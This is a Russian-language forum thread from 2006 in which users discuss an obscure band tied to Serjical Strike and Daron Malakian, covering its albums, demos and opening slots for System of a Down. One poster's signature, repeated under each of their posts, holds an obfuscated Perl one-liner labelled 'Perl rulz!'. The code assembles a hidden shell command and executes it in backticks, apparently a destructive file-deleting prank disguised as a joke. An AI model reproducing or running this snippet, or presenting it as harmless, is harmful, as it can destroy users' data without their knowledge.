кто из присуствующих 3х человек слышал сабж?)) мож скажет пару слов? желателно в течении месяца))
я уже какоето время слушаю и они в некотором роде, нуу, помогли мне пережить некоторые, кхм, события
зы: кто слышал ТОЛЬКО последний альбом, тот ниче не слышал, самая жесть в первом и демках ^_^ _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Июл 29, 2006 12:33 am Заголовок сообщения:
раз такое дело небольшая инфа:
продюсер: малакян
лейбл: сержикал страйк
дарон время от времени появляется у них на концертах, то подпевает, то они из книжки читали чето, про геноцид книжка вроде
последний альбом "lynch_the_weirdo" (2004) какаято смесь панка, хардкора, с чемто еще, и чувствуется мохнатая лапа малакяна
у "zombie nation" интро, такой соадооподобный медляк
до этого все что было, альбом "for the weird by the weird" (1999, переиздан с кучей бонусов в 2003) большей частью грайндкор, тоесть слов почти не слышно, тоже с примесями =), многие из песен были потом для последнего перезаписаны, и я затрудняюсь сказать какая версия лучше, факт то что настройка инструментов раньше была совсем другая, и мне нравится больше чем новая
про демки молчу, там такой пиздец ваще, но у меня есть несколько пред-альбомных ЕР
кстати, 90% гарантия что лобзику не понравицо) это из той категории что "настолько говно что мне нравится" LOL
кроме меня как бы никому не нра
поэтому остальных это тож касается
зы: если кто качал альбом бакетхэда "enter the chicken", там пред или пред-пред последний трэк с участием этих уроццев тока помню что после интерлюдии _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
да, и чем мозг ослом ебать, спросил бы, я бы залил временно и ссылку дал всем желающим в личку чтобы хостинг не доебывался
я ослом первый раз качал, там рип кривой попался _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
хотя бы потомучто я пока никого не встретил кому бы нра))) американцы на соад форумах так ваще говном полили как-то давно, когда они с соад концерты давали, были перед соад типа для разогрева ))))) лол
зы: хотел еще фоток с соад запостить и окно закрыл перед отправкой сообщения, мож потом какнить _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
напоминает сержа на lowlands фестивале _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
гопники - неиссякающий источник вдохновления и улыбания
хорошо хоть у нас они "другие", или мож я гопников подзабыл какие они))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!